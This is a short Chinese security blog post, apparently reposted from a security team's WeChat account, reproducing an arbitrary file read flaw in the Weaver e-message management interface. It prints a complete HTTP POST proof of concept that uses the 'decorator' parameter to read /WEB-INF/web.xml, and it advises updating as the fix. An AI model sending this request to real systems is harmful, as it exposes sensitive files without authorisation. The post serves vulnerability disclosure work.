导读
主要分享学习日常中的web渗透,内网渗透、漏洞复现、工具开发相关等。希望以技术共享、交流等不断赋能自己,为网络安全发展贡献自己的微薄之力!
泛微 emessage 管理界面存在任意文件读取漏洞隐患,攻击者可通过此漏洞获取敏感信息,为下一步攻击做准备。
1、本地搭建,访问界面如下
2、漏洞复现,利用POC读取web.xml如下。
POST / HTTP/1.1Host: 127.0.0.1:9090Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=node03rmjswir0alnezvxvmi7jx8u1497.node0; csrf=P4jVgrrfqikGQQeConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 43decorator=%2FWEB-INF%2Fweb.xml&confirm=true
1、更新到安全版本原文始发于微信公众号(五六七安全团队):泛微 emessage 管理界面存在任意文件读取漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论